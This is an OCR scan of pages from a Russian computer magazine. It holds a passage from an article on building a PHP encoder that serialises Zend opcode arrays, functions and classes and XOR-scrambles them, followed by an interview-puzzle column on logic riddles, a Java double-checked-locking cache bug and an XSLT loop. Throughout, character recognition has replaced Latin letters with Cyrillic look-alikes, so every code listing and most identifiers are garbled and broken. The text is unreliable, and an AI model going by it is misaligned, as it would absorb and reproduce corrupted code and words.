и 2епб_сотрПе_Л1е. Затем 5АРІ выполняет вызов 2 епб_сотріІе_ 
ЛІе, управление получает наш код, читает файл, если найдена 
сигнатура — выполняет восстановление всех структур (если 
нет — выполняется вызов оригинального 2 епб_сотрПе_Л 1 е), воз- 
вращает массив опкодов 5АРІ. 

Это самая простая схема, и хукать 2 епб_ехесіЛе при таком под- 
ходе не обязательно. Но ее можно нехило проапгрейдить, введя 
использование собственной (!!!) виртуальной машины. В этом 
случае полученный оригинальный массив опкодов преобразу- 
ется в массив, понятный нашей ѴМ. А при вызове 2 епб_ехесиІе 
в гепсІ_ор_аггау* проверяется флаг «наш ли это массив» и массив 
отправляется либо на корм рИрбІз.ехесиІе, либо в движок нашей 
машины. 

Конечно, я упустил кучу деталей, касающихся сжатия, шифро- 
вания, обфускации имен и прочих защит. Но мы только поксорим 
для приличия оригинальный массив, да и ктомуже я не стал 
полностью доделывать епсосіег и 2епсІ_ехІеп5Іоп, чтобы не по- 
лучилось, как в том старом советском мультфильме «Вовка в три- 
девятом царстве», когда двое из ларца даже хомячили разный 
вкусный стафф за этого лентяя Вовку. Но не волнуйся, базовый 
функционал останется. 

РУКОТВОРНЫЕ ОПКОДЫ 

Я бы посоветовал начать с проверки того, что я изложил выше. 
Попробуй набросать простенький скелет 5АРІ, взять самый 
элементарный скрипт « < ? р М р есбо 1 Меііо ][';?>», получить 
массив и пробежаться по нему циклом. Если не безобразни- 
чать с С6(сотріІег_орІіоп5), то должно получиться два опкода 
— 2ЕІ\Ю_ЕСН0 и 2ЕІ\Ю_РЕТІІРІ\І. Проверь (лучше в студии), что 
у 2ЕІ\Ю_ЕСН0 тип орі выставлен в С0Ы5Т(1), а орі.и.сопзіапі.ѵаіие. 
зіг.ѵаі указывает на нашу строку. 

Теперь усложняем задачу. Создадим набор данных, которые 
отработают и не обвалят нашу программу, когда мы их подкинем 
2 епб_ехесиІе. 

Создаем и инициализируем массив: 

// Объявления 

іепсІ_ор_аппау* ор_агг; 

гепсІ_ор* іо = N1111; 

ор агг = (2епгі_ор_аггау*)ета11ос(5І2еоТ(2епсІ_ор_аггау^П ; 
теш5е1:(ор_агг , 0, 5І2еоіХгепсІ_ор_аггау) ) ; 
ор_агг- >ѣуре = 2ЕМР_и5ЕК_РШСТІОМ; 
орагг- >ра55_ге5І:_Ьу_ге-Регепсе = ѲхѲсІ ; 



В 2ЕЫО_ОР_АККАѴ* 
ПРОВЕРЯЕТСЯ ФЛАГ «НАШ 
ЛИ ЭТО МАССИВ» И МАССИВ 
ОТПРАВЛЯЕТСЯ ЛИБО НА 
КОРМ РНР5Т5.ЕХЕС0ТЕ, ЛИБО 
В ДВИЖОК НАШЕЙ МАШИНЫ 

ор агг->с!опе разз ~Ыо = 1; 
ор_агг->б1епате = "іпсіех. рбр"; 
ор_агп->ге-Рсоип1: = (гепсІ_иіп 1:*^ета11 ос( 

5І2ео-Р(г епсІ иіп'Е’П; 

*ор_агг->геТсоип1: = 1; 
ор_агг->сиггеп~Е_Ьгк_соп1: = -1; 
ор_агг->1:ІіІ5_ѵаг = -1: 
ор_агг->еаг1у_ЬіпсІіп§ = -1; 
ор_агг->5І2е 2; 

Осталось только «приготовить» опкоды и вручить ѴМ: 

ор_агг->орсосІе5 = (гепсІ_ор*)ета11ос( 
зігео-ІЧ гепсІ ор) * 2); 

тет5е1=(ор_агг->орсосІе5 . 0. зігео-РГг епсІ ор^ * 2) ; 
іо = ор_агг->орсосІе5; 



20 ->орсосІе = 2ЕМРЕСН0; 

20->ор1.ор Ііѵре = 15 СРЫЗТ; 

2ѴАІ__5ТКІме(&20->ор1.и.соп5І:ап1:., "Ііеііо ]_[Т.,1); 

5ЕТ_ЦМЦ5ЕР(20->ор2Ѵ. 

2епсІ_ѵт_5е1:_орсосІе_ІіапсІ1ег(2о); 

20 ++; 



20 ->орсосІе = 2ЕМР_КЕТІЖМ; 

20 ->ор 1 .ор_ 1 :уре ^І5_СОМ5Т; 
2ѴА110М6(&2о->ор1.и.соп5І=ап1: Л) ; 

5ЕТ_ШІІ5ЕР(20- >ор2) ; 

2е п сІ_ѵт_5 е1:_о р с осі е_И а псі 1 е г ( 2 ю); 

2епсІ_ехеси1:е(ор_агп Т5КМІ.5ССѴ. 

Только что ты написал « Н е 1 1 о ѵѵогісі» на ассемблере ѴМ РНР. 
По-моему, круто. 



ГСедізІегесІ 
ЗДгеат Ріігегз 
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Рис. 4. А воттеперь РНР узнает в тебе брата. Мелочь, а приятно! 
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ДВИГАЕМСЯ ДАЛЬШЕ 

На этом этапе можно поэкспериментировать с сохранением и вос- 
становлением тех структур, что мы подсовывали в 2 епб_ехесиІе 
заголовком ранее. Какой-то РНР-код будет работать, но скорей 
всего что-то более сложное вызовет ассезз ѵіоіаііоп глубоко 
в ядре движка. И даже если ты догадался проверять оба операн- 
да на І5_С0 N51, а ор{1,2}.и.сопз1апиуре на І5_5ТР I N О, то это все 
равно мало поможет делу. Необходима стратегия или какой-либо 
формальный алгоритм, которого мы будем придерживаться. 

Сказано — сделано. Действовать будем так. Определим 
перечисление, указывающее на тип сохраненных за ним данных 
(гепсІ_ор_аггау, массив 2 епб_ор, строки, переменные). Опреде- 
лим урезанную структуру х_ор_аггау (выкинем из 2 епб_ор_аггау 
все элементы-указатели). Получим массив, пробежимся по нему, 
сохраняя все строки, и запишем в выходной файл такие данные: 
ХРТ_5ТРІІ\ІС5, количество строк [, индекс строки, длина строки, 
сама строка], ХРТ_ОРАРРАУ, х_ор_аггау, ХРТ_0РССЮЕ5, количе- 
ство опкодов[,гепс1_ор]. 

Здесь ХРТ 5ТР I N 35, ХРТ_ОРАРРАѴ и ХРТ_0РССЮЕ5 — элемен- 
ты перечисления (тип сохраненных данных). Индексом строки бу- 
дем заменять указатель на строку, например сЬаг* 2 епб_ор_аггау. 
1шпсІіоп_пате заменится на ипзідпесі Іопд х_ор_аггау.І : ипсІіоп_ 
пате (был указатель — стал индекс). Длину необходимо сохра- 
нять, так как РНР оперирует и бинарными строками и совсем не 
прочь поработать с ІІІМІССЮЕ'ом. Сами опкоды 2 епб_ор сохраняем 
«как есть», только у строк корректируем длину (если корректиро- 
вать указатель — нас не поймут при вызове безІгоу_ор_аггау) на 
наш индекс. При восстановлении вызываем: 

2ЕІ\Ю_АРІ ѵоіс] г епсі ѵш зеі: орсосіе бапс11ег( 
гепсІ_ор* орсосіе); 

чтобы прописался нужный обработчик опкода. 

Хорошо, но мало. Мы даже с переменными работать не можем. 
Но эту беду легко поправить. Добавляем в перечисление новый 
элемент ХРТ_ѴАРІАВІ_Е5. Назначаем ему место в конце цепочки, 
а саму комбинацию представляем так: ХРТ_ѴАРІАВІ_Е5, количе- 
ство переменных [, индекс имени переменной]. Индекс имени 
— это то же самое, что и индекс строки (строки храним вместе, 
если где видишь индекс — знай, что это из массива строк). Сами 
переменные лежат и ждут сохранения в 2 епб_ор_аггау.ѵагз — 
это массив 2 епб_сотріІесІ_ѵагіаЫе, размером в 2 епб_ор_аггау. 
ІазІ_ѵаг. 

•Еѵресіе-Р зіігисі: _2еп сІ_сотрі1есІ_ѵагіаЬ1е { 
сбаг *пате; 
іп~Е пате і еп; 
и!оп% ІіазНѵаІие: 

} 2епсІ_сотрі1есІ_ѵапіаЫе; 

базЬ_ѵаІие — это результат работы 2епсІ_іпІіпе_Ьа5Ь_Ги пс из 
2епб_Ьа5Ь.Ь. Остальное в пояснениях не нуждается. 

Стало легче? Переменные назначаются, функции вызываются. 
Красота. Но скоро придет облом, когда выяснится, что зѵѵіісб/ 
сазе, Ігу/саІсЬ, а заодно и «любимый» доіо в опале. «Видимо, что- 
то случилось!» (С) Сотебу СІиЬ. Внимательно смотрим на массивы 
2 епб_ор_аггау.Ьгк_сопІ_аггау и 2 епб_ор_аггау. 1 гу_са 1 сЬ_агтау. 
Границы, как ты уже догадался, определяются через гепб_ор_ 
аггау.Іа5І_Ьгк_сопІ и 2 епб_ор_агтау.ІазЕ_Егу_саІсІі. Элементы 
массивов не содержат указателей и легко сохраняются. 

•Еѵребе-Р зіігисі: геп бЬгксогтЕеІете пІ: I 

іггЕ 5~ЕагЕ; 
іп-Е соп1=; 
іп~Е Ьгк; 
іпі: рагепі:; 

} гепсІ Ьгк соігЕ еІетеігЕ ; 



-Еѵребе-Р зіігисі: іепб •Егу_са~ЕсІі еіетепѣ { 

гепб иіггЕ 1:гу_ор; 

гепбиіігЕ саіісіі ор; /* кеіісііир! */ 

} гепб 'Егу са'ЕсІі еІетеігЕ ; 

Советую сохранять их ближе к ХРТ_ОРАРРАѴ, лучше сразу за 
ним. Но это еще не все, что нужно для восстановления. В движке 
есть группа опкодов для навигации по массиву. Каждый из них 
хранит в первом или втором операнде указатель на гепб_ор*, 
куда при определенных условиях должен прыгнуть курсор вир- 
туальной машины. Для восстановления необходимо вычислить 
номер опкода по нехитрой формуле: (адрес гепб_ор* для прыжка 
минус адрес первого опкода) поделить на размер гепб_ор. 
2ЕІ\Ю_бМР и 2ЕІ\Ю_В0Т0 прячут адрес в 2епб_ор.ор1.и.]тр_аббг, 
а 2ЕІ\Ю_бМР2, 2ЕІ\Ю_бМРІ\І2, 2ЕЫ0_бМР2_ЕХ, 2ЕМ0_бМРЫ2_ЕХ 
и 2ЕЫ0_ЛѴ|Р_5ЕТ в гепб_ор.ор2.и.]тр_аббг. 

Ну что ж. Три из пяти баллов нам обеспечены. Теперь попробу- 
ем зарегистрировать РНР-функцию: 

< ? рГ ір 

-Рипсіііоп ТипсіП 
геііигп Чезі: 1 ; 

} 

И на месте опкода с определением функции видим преда- 
тельство, сопоставимое с предательством любимой девушки 
(хотя нет, вариант с девушкой гораздо хуже). Там, где должен 
был быть 2ЕМ0_0ЕСІ_АРЕ_РІІІ\ІСТІ0І\І, красуется 2ЕМ0_І\І0Р. 

В качестве милостыни в 2 епб_ор.ехІепбеб_іпІ : о оставлен номер 
опкода, которым когда-то был 2ЕІ\Ю_І\І0Р. Впрочем, погруже- 
ние в исходники дает ответ. Функция 2 епб_бо_еагІу_Ьіпбіпд 
из 2 епб_сотріІе.с после определения РНР-функции стирает 
о ней всю информацию из опкода. Обидно, досадно, но ладно. Я 
вижу два пути решения проблемы. Первый — попросить 2 епб_ 
бо_еагІу_Ьіпбіпд не делать такую подлость (закомментировать 
стирание опкода в самом ее конце) и перекомпилировать дви- 
жок (рЬ рбЕз.сІ 1 1 мы ведь будем поставлять с епсобег'ом). Второй 
— прошерстить массив Еб^ипсІіоп^аЫе) на предмет функций 
(так, как мы делали при написании хакерского РНР ехіепзіоп), 
у которых гепсМипсІіоп.Іуре равен 2ЕІ\І0_ІІ5ЕР_РІІІ\ІСТІ0І\І (по- 
рядок определения значения не имеет, главное — это регистра- 
ция функции). гепсМипсІіоп является объединением и выглядит 
так: 

•Еуребе-Р ипіоп г епб -Рип сЕіо п { 

2 епб_исІіаг 1:уре; 

2 епб_ор_аггау ор_аггау; 



} іепб_±ипс1:іоп; 

То есть РНР-функция — это обычный массив опкодов, 
который мы уже умеем сохранять. Определим новый элемент 
перечисления ХРТ РО N СТІ О N5. Дописываем в конец цепочки: 
ХРТ_РШ\ІСТІ0І\І5, количество функций[, ХРТ_ОРАРРАѴ и так 
далее все, до переменных включительно]. При восстановлении 
достаточно будет добавить ор_аггау нашей функции в массив 
Е6(1шпсІіоп_ІаЫе). 

Ну вот, на четверку с минусом уже можем претендовать. Мало? 
Согласен. Следующее, о чем необходимо позаботиться, — это 
классы, определенные пользователем. Здесь реально есть где 
развернуться: магические функции, реализованные интерфейсы, 
свойства класса, наследование. Но мне лень обрабатывать все 
это, поэтому ограничимся только необходимым — сохраним сам 
класс, методы класса и свойства. С классом поступим, как и с 
гепб_ор_аггау, то есть введем упрощенную структуру х_сІазз_ 
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Рис. 5. Слева направо: исходный скрипт, закодированный скрипт, результат работы 



епігу. Конечную цепочку представим так: ХРТ_СІ_А55, количество 
классов, [х_сІаз5_епІгу, ХРТ_СІ_А55_МЕТНСЮ5, количество ме- 
тодов [, тут 2 епсІ_ор_аггау и все, что с ним связано], ХРТ_СІ_А55_ 
РР0РЕРТІЕ5, количество свойств [, тут сами свойства]]. Сначала 
посмотрим, как можно упростить 2епсІ_сІа55_епІгу (а структура 
немаленькая, см. гепсІ.Ь): 

іѵресІеТ Бігисі: _х_с1а55_еп1:гу{ 



сііаг і ѵре; 
ипБІ^песІ Іопд п ате: 
гепсі _иіп1: пате Іеп^ііі; 
іпі геісоипі; 

гепсІЬооІ соп5іапі5_ирсІаіесІ; 
гепсІ_иіпі се_Ла§5; 
гепсІ_иіпі 1іпе_5іагіх_ 
2 епсІ_иіпі 1іпе_епсІ; 



} х_с1а55_епігу; 

Не так все плохо, как казалось. Методы, привязанные к клас- 
су, лежат в 2епсІ_сІа55_епІгу.І : ипсІіоп_ІаЫе, при этом модифика- 
торы доступа риЫіс/ргоІесІесІ/рпѵаІе привязаны к массиву и нахо- 
дятся в гепсІ_ор_аггау.1 : п_1 : Іад5. Свойства класса расположились 
в двух массивах: 

5І:гис1: _гепсІ_с1а55_епігу { 



НазІіТаЫе сІе-Раи1і_ргорегііе5; 

НазІіТаЫе ргорегііе5_іпіо; 

іИ 

сІеІ'аиН ргорегІіез хранит гѵаі** (значение, которым инициа- 
лизируется свойство в классе), ргорегІіез_іпІ : о — указатель на 
геп сІ_ргорегІу_іпі : о: 

іѵресіеі Бігисі ге псі ргорегіу і піо { 
гепсіиіпгі Яа§5 ; 
сііаг *пате; 

іпі: патеіеп^ііі ; 

и1оп§ Іі; 

сііаг *сІос_соттепі; 
іпі: сіо ссоттепііеп ; 

2епсІ_с1а55_епігу *се; 

} 2 епсІ_ргорегіу_іп-Ро: 

Флаги — это модификаторы доступа, пате — имя свойства. 
Имя свойства может храниться в замангленном виде, для получе- 
ния правильного имени нужно выполнить функцию: 

2ЕІМРАРІ іпі: 2епсІ_иптап%1е_ргорегіу_пате( 



сііаг *тап§1ес1_ргорегіу . 
іпі тап^іесі ргорегіѵ Іеп. 

сііаг **ргор_пате л 

сііаг **с1а55_пате) ; 

тапдІесІ_ргорегІу и тапдІесІ_ргорегІу_Іеп берем из гепсІ_ 
ргорегіуіпіо. В третий параметр функция запишет указатель 
на размангленное имя свойства. В четвертый тоже сунь адрес 
на какой-нибудь указатель, а то движок обидится и скопытится 
раньше времени. 

Теперь о восстановлении классов. После выделения памяти 
под 2епб_с1а55_еп1гу вызываем: 

2ЕІМР АРІ ѵоісі 2епсІ_іпіііа1І2е_с1а55_сІаіа( 

2епсІ_с1а55_епігу *се л 

2епсІ_Ьоо1 пи11і-Ру_ІіапсІ1ег5 Т5КМІ_5_РС); 

п и 1М1 : у_Ьа псі ІегБ задает обнуление указателей на обработчики 
и магические методы (ставим «1»). Регистрируем класс редакти- 
рованием Е6(с1а55_1аЫе) через 2епсІ_Ііа5Іі_[асІсІ I ирсіаіе] после 
полного восстановления свойств и методов. При регистрации 
нужно привести имя класса (второй параметр 2епсІ_Ііа5Іі_*) 
к нижнему регистру, иначе класс не будет найден при попытке 
создания экземпляра. 

Методы регистрируем так же, как и функции, только там, отку- 
да их брали (сеТипсІіоп_ІаЫе). И перед регистрацией в 2 епсІ_ор_ 
аггау.зсоре прописываем 2епб_сІа55_епІгу восстанавливаемого 
класса. Свойства регистрируем этой функцией: 

2ЕІ\Ю_АРІ іпі: 2епсІ_сІес1аге_ргорегіу( 

2епсІ_с1а55_епігу *се л 

сііаг *пате і 

іпі пате_1еп§іН . 

гѵаі *ргорегіу., 

іпі ассеББіѵре Т5КМ1_5_РС); 

ргорегіу — это адрес константы, сохраненной в 2 ѵаІ, которой 
инициализируется свойство. ассе55_1уре — модификаторы до- 
ступа (гепсіргорегіуіпіо.ііадз). 

ТВЕРДАЯ ЧЕТВЕРКА 

На четверку с плюсом осталось зашифровать данные прими- 
тивным ХОР (даже не знаю, почему я выбрал ключ 0x02031984), 
прописать заглушку и собрать все вместе. Что получилось у меня, 
ты можешь посмотреть на диске. 

До пятерки еще далеко. Я сознательно забил на статические 
переменные, интерфейсы класса, магические методы, наследо- 
вание и кучу других важных и правильных вещей. А протекция 
заключается только в сокрытии исходника (ХОР не считаем). Тем 
не менее, у нас получился неплохой пример того, за что с буржуев 
трясут их кровное зеленого цвета бабло. Будут коммерческие 
предложения — пиши. А пока — адьос! ІйІ 
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Павел Александрович (іѵіпзісІе.ЫодзроІ.сот) 
Александр Латушкин (аІехЙБкаіоДпед.ги) 




ПОДБОРКА ИНТЕРЕСНЫХ ЗАДАНИЙ, 
КОТОРЫЕ ДАЮТ НА СОБЕСЕДОВАНИЯХ 



Сегодня в нашем выпуске основательный разбор кода на Оаѵа, неведомый Х5І_Т и, конечно 
же, полюбившиеся многим логические задачки. 



УСЛОВИЕ 

На острове живут 13 желтых, 15 синих и 17 красных хамелеонов. Ког- 
да встречаются два хамелеона разного цвета, они перекрашиваются 
в третий цвет. В остальных случаях ничего не происходит. Может ли 
получиться так, что все хамелеоны окажутся одного цвета? 

РЕШЕНИЕ 

Как и во многих подобных задачках, здесь полезно рассмотреть 
ситуацию с конца. Предположим, что все хамелеоны стали одного 
цвета. Давай прикинем, какое событие предшествовало этому. 
Очевидно, что перед этим было по одному хамелеону двух цветов, 
а остальные — третьего (например, 1 желтый, 1 синий и 43 крас- 
ных). Нетрудно заметить, что в общем случае для перекрашивания 
всех хамелеонов в один цвет необходимо, чтобы было одинаковое 
количество хамелеонов двух цветов. Тогда они дружно перекрасят- 



ся в третий. Но такое никогда не произойдет, что можно показать 
простым перебором. Либо заметить, что количество всех хамелео- 
нов — число нечетное. Следовательно, оно не делится на два и как 
минимум один хамелеон всегда будет без пары и другого цвета. 

УСЛОВИЕ 

В тюрьме сидят 10 заключенных, каждый — в одиночной камере. 
Общаться между собой они не могут. В один прекрасный день на- 
чальник тюрьмы объявил им, что предоставляет всем шанс выйти 
на свободу, и предложил следующие условия: «В подвале тюрьмы 
есть комната с переключателем, имеющим два состояния: О N/0 РР 
(верх/низ). Вас будут в произвольном порядке по одному приводить 
в эту комнату и через несколько минут уводить. Находясь в комна- 
те, каждый из вас можетлибо изменить положение переключателя, 
либо ничего с ним не делать. Персонал тюрьмы трогать этот пере- 
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Задачи на собеседованиях 



ключатель не будет. В какой-то момент один из вас (любой) должен 
сказать, что в комнате побывали все заключенные. Если он ока- 
жется прав — всех отпустят, если ошибется — вы навсегда оста- 
нетесь в тюрьме. Я обещаю, что в комнате побывают все заклю- 
ченные и что каждого из вас будут приводить туда снова и снова 
неограниченное число раз». После этого заключенным разрешили 
собраться и обсудить стратегию, потом развели по камерам. Что им 
нужно делать, чтобы гарантированно выйти на свободу? 

РЕШЕНИЕ 

У задачи существует несколько решений. Начнем с простого. Все 
дни разбиваем на интервалы по 10 дней, таким образом за каждым 
заключенным закрепляется определенный день. Они договарива- 
ются, что если кто-то из них попадает в комнату не в свой день, то 
ставит выключатель в положение 014. Следовательно, если в 10-й 
день заключенный входит в комнату и видит выключатель в ОРР, 
значит в эти 10 дней в комнате все побывали. Нетрудно догадаться, 
что вероятность такого события крайне мала. 

Более оптимальный вариант — не закреплять за каждым 
заключенным день, а просто сигнализировать о том, что в одну де- 
каду один человек зашел в комнату дважды. В этом случае следует 
возвести выключатель в ОЫ. В остальном тактика остается та же. 
Точные расчеты показывают, что в этом случае заключенные вый- 
дут на свободу примерно через 75 лет, что мало кого устраивает. 

И наконец, оптимальный вариант! Заключенные договаривают- 
ся, что первый, кто зайдет в комнату, будет считать, сколько зашло 
человек после него. Он возводит выключатель в ОРР и уходит. Сле- 
дующий человек, если он вошел в первый раз, сигнализирует об 
этом, устанавливая выключатель в ОІМ. Если он вошел не в первый 
раз или выключатель уже в ОІМ, то человек ничего не делает. Как 
только наш «счетчик» попадет в комнату во второй и последующий 
разы, видя выключатель в ОІМ, он смекает себе в уме «+1» и воз- 
вращает выключатель в ОРР. Таким образом, сосчитав до 10, он со 
спокойной совестью может сообщать, что в комнате побывали все 
заключенные! Такая тактика позволяет заключенным выбраться 
на свободу в среднем за 118 дней. 

УСЛОВИЕ 

Перечислите все проблемы, которые вы видите в данном коде: 

риЬІіс аЬзігасі сіазз Рі%е5І: { 

ргіѵаііе Мар<ЬуЕе[]. ЬуЕе[]> сасііе = 
пеш НазІіМар<Ьѵ1=е[] . ЬѵЕе[]>(); 



риЬІіс Ьу1:е[] сІі^е5І=(Ьу1=е[ ] іприі: ) { 
ЬуСе[] гезиіі: = сасіпе . ^е1= ( ±при1= ); 
(гезиіі: == пиіі) { 
зупсбгопігесі (сасбе^ { 

гезиіі: = сасбе.§е1:(іпри1:); 

ІТ (гезиіі: == пиИ) { 

гезиіі: = сіойі^езі: ( іприі: ) ; 
сасІіе.ри1:( іприі: . гезиіі: V. 

} 

} 

} 

геіигп гезиіі:; 

-Ь- 



ргоіесіесі аЬзігасІ: ЬуЬе[] с!оРі^ез1:(Ьѵ1:е[ ] і приі:); 

Ь_ 

РЕШЕНИЕ 

В этом коде две основные проблемы и одна «особенность». 

1. Использование массива (ЬуІеП) в качестве ключа в НазЬМар. 
Дело в том, что НазЬМар в своей работе опирается на мето- 
ды ЬазЬСосІе и ециаіз объекта-ключа. Грубо работа НазЬМар 
выглядиттак: при чтении или записи значения в коллекцию 



вызывается метод ГіазЬСосІе объекта-ключа, который возвра- 
щает целое число. По этому числу определяется номер корзины 
(Ьискеі), объекты-ключи в которой далее последовательно 
сравниваются с переданным ключом с помощью метода ециаіз. 
Когда метод ециаіз вернет Ігие — искомое значение найдено. 
ЬуІеП (как и любой другой массив) в Эаѵа является наследником 
класса 0Ь)ес1 и, соответственно, наследует все его методы, 
в том числе и ГіазЬСосІе и ециаіз. 

Реализация этих методов в классе О Ь і е с 1: опирается на «адрес» 
объекта в памяти, а не на его содержание. Это приводит к тому, 
что для двух разных объектов — массивов с одинаковым содер- 
жимым метод ециаіз вернет іаізе: 

Ьѵ1:е[ ] аггауі = пеш Ьѵ іе []{1.2.3 .4.5> : 

Ьѵ1:е[ ] аггау2 = пеш Ьѵ іе []{1.2.3 .4.5> : 

аггау1.едиа1з(аггау2) // -Раізе 

аггаѵі. РіазІіСосІеП==агпаѵ2. ІіазЬСосІеП // Таізе 

И соответственно, НазЬМар работать не будет: 

Мар<Ьѵ1:е[] ,$1:гіп^> шар = пеш НазІіМар<Ьѵ1:е[ ] . 5іпіп^>П; 
тар. риі: (аггауі. "зотеѴаІие") ; 
тар.соп1:аіп5Кеу(аггау2) // -Раізе 
тар.§е1:(аггау2) // пиіі 

Это приведет к тому, что «кеширование» результатов вычис- 
лений просто не будет работать и значения будут каждый раз 
вычисляться повторно (и сохраняться в памяти). 

2. Неправильная работа в многопоточном окружении. 

В коде практически в классическом виде представлена идиома 
йоиЫе СЬеск Боскіпд. Эта идея не является специфичной для 
Эаѵа, и суть ее в том, что полноценно захватывать блокиров- 
ку — операция «достаточно дорогая» и хорошо бы избежать 
этого, если в блокировке нет необходимости. В данном случае 
производится проверка на отсутствие значения в сасЬе; если 
значение отсутствует, то мы получаем блокировку на объект 
сасЬе (с целью его последующего монопольного изменения) 
и проводим повторную проверку на отсутствие значения, при от- 
сутствии значения в сасбе производим необходимые операции. 

В теории такой алгоритм позволит захватывать блокировку 
только в случае промаха кеша (что должно происходить редко, 
иначе применение кеша просто лишено смысла). 

Проблема только в том, что это не работает. Такая реализация при- 
ведет к появлению трудно диагностируемых ошибок. Например, 
в кеше присутствует значение для нашего ключа, но оно «почему- 
то» равно пиіі или разного рода гипііте-ошибкам при работе 
с НазЬМар, вызванным тем, что из-за неправильной многопоточ- 
ной работы будет нарушена его внутренняя организация. 

Это «странное» поведение — результат того, что в ЭѴМ для 
оптимизации реализованы механизмы перестановки инструк- 
ций (геогбегіпд) и особенностей видимости изменений, произ- 
веденных одним потоком в другом (ѵізіЬіІіІу). Тема организации 
правильной работы в многопоточной среде достаточно обширна 
и выходит за рамки нашей рубрики. Чтобы получить общее 
представление, о чем идет речь, достаточно рассмотреть сле- 
дующий фрагмент кода: 

бпаі сіазз БеіСбеск { 

ргіѵаіе іпі а = 0 ; 
ргіѵаіе Іоп^ Ь = 0; 



ѵоісі з еіП { 
1 ; 

Ь = - 1 ; 

} 



Ьооіеап сбескП { 
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ыбі1е( Ь ! =-1) ; 

Бузует. ои^.ргіггЫп (а); 

} 

} 

Пусть поток А выполняет метод зеі и параллельно с этим поток 
В выполняет метод сбеск. Мы рассчитываем, что, когда Ь станет 
равной -1, в переменной а будет 1. Но так будет происходить да- 
леко не всегда. Время от времени могут наблюдаться зависания 
потому, что поток В никогда не «увидит» изменения значения 
переменной Ь, сделанные потоком А. Аналогично время от 
времени программа будет печатать «О» — потому, что изменения 
не «видны» в потоке В, или потому, что компилятор и/или .ЛѴМ 
изменили порядок инструкций и метод зеі превратился в: 

ѵоісі зе1=() { 

Ь = -!; 
а = 1; 

} 

Если бы вместо переменных примитивных типов мы исполь- 
зовали объекты, при неправильной синхронизации в одном из 
потоков можно было бы наблюдать не полностью инициали- 
зированные экземпляры классов, попытка работы с которыми 
сопровождалась бы недетерминированным выбрасыванием 
исключений. 

3. «Особенность» — кеширование здесь организовано таким об- 
разом, что элементы никогда не удаляются. При интенсивном 
использовании это приведет к ОиШі'МетогуЕхсерІіоп. 

УСЛОВИЕ 

Выведите на экран с помощью Х5І_Т версии 1.0 все четные числа 
в диапазоне от 1 до 1 000 000. 



РЕШЕНИЕ 

Язык Х5І_Т является декларативным, а не процедурным. Поэтому 
в нем не предусмотрены какие-либо встроенные конструкции для 
циклов. Тем не менее умельцы создали некий костыль, суть кото- 
рого такова, что шаблон Іоор вызывается рекурсивно: 

<?хш1 ѵег5Іоп="1.Ѳ" епсос!іп%="и1:Т-8" ?> 

<хз1 : з'ЬуІезІіее'Е ѵегзіоп="1.0" 

хтіпз : хз1^"1і1:1:р : //ммм .м 3 . ог§/1999/Х5І_/Т гапз-Ропт" > 
<хз1:ои1:ри1: те1:ИосІ= " М:т1 " 

оті1:-xт1-сIес1а^а1:іоп= ,, по ,, іпсIеп1:= ,, уе5 ,, /> 



< хз!:1=ет р 1а 1:е та±сЬ="/"> 

<Х5І : са11-1:етр1а1:е пате="1оор"> 

<хз1:ыі1: б-ра пат пате^"ѵаг">2</хз1 :ыі1:б-рагат> 

і/хзі: са11-1:етр1а1:е> 

</хз1:1:етр1а1:е> 



<хз1 : Ііетрі аііе пате="1оор"> 

<хз1:рагат пате="ѵаг"х/х5І:рагат> 
<хз1:сбоозе> 

<хз1:ыбеп 1:е5І:= ,, $ѵаг &11:; 1ѲѲѲ0"> 
<хз1:ѵа1ие-о-Р зе!ес1=="$ѵап" /> 
<хз1:1:ех1:> </хз1 :1:ех1:> 
<хз!:са11-1:етр1а1:е пате="1оор"> 
<хзііыі1:б-рагат^пате= ,, ѵап ,, > 
<хз1:питЬег ѵа1ие="питЬег($ѵаг)+2" /> 

</хз1:ыі1:б-рагат> 

</ хзі : са11-1:етр1а1:е> 

</хз1 :ыбеп> 

</хз1:сбоозе> 

</хз1:1=етр1а1=е> 

</хз1:з1:у1е5Ііее1:> 



Здесь также присутствует параметр ѵаг, выполняющий роль 
счетчика и каждую итерацию увеличивающийся на 2. Для работы 
этого примера еще нам потребуется любой валидный хті, напри- 
мер: 

<?хт1 ѵег5Іоп="1.0" епсосИп^'и^-Р-З" ?> 

<1:е5І:> 

</Іез1:> 

Проверить работу этого примера можно с помощью консольного 
процессора Х5І_Т: 

$ хзііірпос --тахсІер1:б 1000000 хзііоор.хзі Ііезі: .хті 

Параметр --тахсІеріЬ здесь используется для того, чтобы пре- 
дотвратить появление ошибки о возможной бесконечной рекурсии 
в шаблоне. И-И 



В СЛЕДУЮЩЕМ ВЫПУСКЕ 

1 . Что происходит, когда пользователь вбивает адрес в адресную 
строку браузера (от момента нажатия кнопки <ЕпІег> до момента 
отображения страницы)? 

2. Перед вами пример части ассезз-лога веб-сервера, на котором рабо- 
тает сервис Яндекс.Погода. 

[ 10/3и1/2010 : 00 : 13 : 18 +0400] ро§ос!а.уапгіех. ги 2. 2. 2. 2 
"6ЕТ /сМегпі^оѵ НТТР/1Л" 200 "И1:ѣр://ццц.уапсІех.иа/" 
"Мо2І11а/4.0 (сотраѣіЫе; М5ІЕ 8.0; Ілііп сіоцз N1 5.1; 
ТгігіепѣМ .0)" 113 

[ 10/3и1/2010 : 00 : 13 : 19 +0400] ро^осіа.уапсіех.ги 3.3. 3.3 
"СЕТ /гиззіа НТТР/1.1" 200 

" ІтЬѣр : //ро^осіа . уапсіех . ги/27612/сбоозе/ " "Орега/9 . 52 
(ілііпсіомб N1 6.0; Ц; МКА 5.5 (Ьиіісі 02842 V. гиУ 119 
[10/3 и 1/2010: 00: 13: 20 +0400] ро§осІа.уапсІех.ги 5. 5. 5.6 
"СЕТ / НТТР/1.1 " 302 "ІтЫ р : //ммм. уапсіех. ги/" 

"Мо2І11а/4.0 (сотраѣіЫе; М5ІЕ 8.0; Ілііпсіомз МТ 6.1; 
1лІ01лІ64; ТгісІеп-Ь/4.0; 5І.СС2; .МЕТ СИ* 2.0.50727; 

.МЕТ СІ.К 3.5.30729; .МЕТ СІ_К 3.0.30729; ІпТоРа1:М.2)" 203 

Любымудобнымдлявасспособом определите, пожалуйста, для 
полного лога из нескольких миллионов строк: 

а. топ-3 рефереров, с которых перешли на главную страницу серви 
са (/) или на страницу с прогнозом погоды в Москве 
(/тозсоѵѵ), и число таких переходов; 

б. в какое время уложилось 95% запросов (время ответа в мил- 
лисекундахуказано в последнем столбце каждой строки) для 
страниц с прогнозом погоды в Киеве (/кіеѵ). 

3. Напишите на Заѵа ІосЫгее реализацию класса с методом 
Відіпіедег пехі(), который возвращаетэлементы последователь- 
